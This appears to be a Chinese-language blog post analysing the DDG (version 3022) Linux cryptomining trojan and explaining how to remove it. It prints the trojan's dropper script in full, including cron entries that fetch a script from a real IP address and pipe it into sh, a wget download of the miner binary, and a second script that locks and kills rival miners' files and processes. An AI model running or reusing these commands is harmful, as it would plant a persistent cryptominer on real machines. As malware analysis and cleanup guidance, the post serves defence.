一、下載
下載腳本:http://119.9.106.27:8000/i.sh(i.sh名稱位ddgs一貫的作風)
樣本地址:119.9.106.27:8000/static/3022/
首先下載i.sh腳本分析下里邊的內容
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "*/15 * * * * (curl -fsSL http://119.9.106.27:8000/i.sh||wget -q -O- http://119.9.106.27:8000/i.sh) | sh" | crontab -echo "" > /var/spool/cron/rootecho "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/rootmkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/crontabs/rootecho "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/crontabs/rootcd /tmp touch /usr/local/bin/writeable && cd /usr/local/bin/ touch /usr/libexec/writeable && cd /usr/libexec/ touch /usr/bin/writeable && cd /usr/bin/ rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeableexport PATH=$PATH:$(pwd) ps auxf | grep -v grep | grep lrnbbce || rm -rf lrnbbce if [ ! -f "lrnbbce" ]; thenwget -q http://119.9.106.27:8000/static/3022/ddgs.$(uname -m) -O lrnbbce fi chmod +x lrnbbce $(pwd)/lrnbbce || /usr/bin/lrnbbce || /usr/libexec/lrnbbce || /usr/local/bin/lrnbbce || lrnbbce || ./lrnbbce || /tmp/lrnbbceps auxf | grep -v grep | grep lrnbbcb | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep lrnbbcc | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep lrnbbcd | awk '{print $2}' | xargs kill -9`
ddg木馬的老套路了,寫環境變量、添加到定時任務、下載礦機執行、刪除禁用其他挖礦木馬(挖礦行業競爭很激烈了)
從3014版本開始增加了云端配置下發 disable.sh 來集中干掉競爭對手,
腳本地址:http://119.9.106.27:8000/static/disable.sh,內容如下
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinmkdir -p /opt/yilu/work/{xig,xige} /usr/bin/bsd-port
touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chmod -w /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64rm -rf /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
touch /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chmod -rw /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chattr +i /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinuxif [ -e "/tmp/gates.lod" ]; thenrm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)kill -9 $(cat /tmp/gates.lod)rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)kill -9 $(cat /tmp/moni.lod)rm -rf /tmp/{gates,moni}.lod
fips auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
把同類的挖礦進程放到了這個腳本中,來殺掉yilu、以及BillGate家族的gates進程等
不過這都是之前版本的,現在這個更高級了,直接下發二進制程序disable
這個disable的作用可以參考下360的那篇文章:圖片來自360netlab博客
?
目前為了阻止其它挖礦程序ddg3022主要做了以下措施
1.修改Hosts文件,阻止其它挖礦程序的下發
2.殺掉其它挖礦程序
3.使用二進制文件disable
?接下來執行腳本開始我們的復現過程 ,crontab已經寫入
CPU已經滿載,挖礦程序已經在運行
?
三、清除
老套路,挖礦木馬干什么咱們反著來就是了
刪除/var/spool/cron/crontab/root,/var/spool/cron/root文件中 echo "*/15 * * * * curl -fsSL http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root
刪除/tmp/6Tx3Wq,/tmp/disable,/usr/bin/lrnbbce
kill掉進程:6Tx3Wq,lrnbbce
此時挖礦程序已經清理,后續可以刪除被增加的hosts等文件
?
參考文章:
https://blog.netlab.360.com/https-blog-netlab-360-com-a-fast-ddg-3014-analyze/
?
?
)
語言基礎)
基礎)
)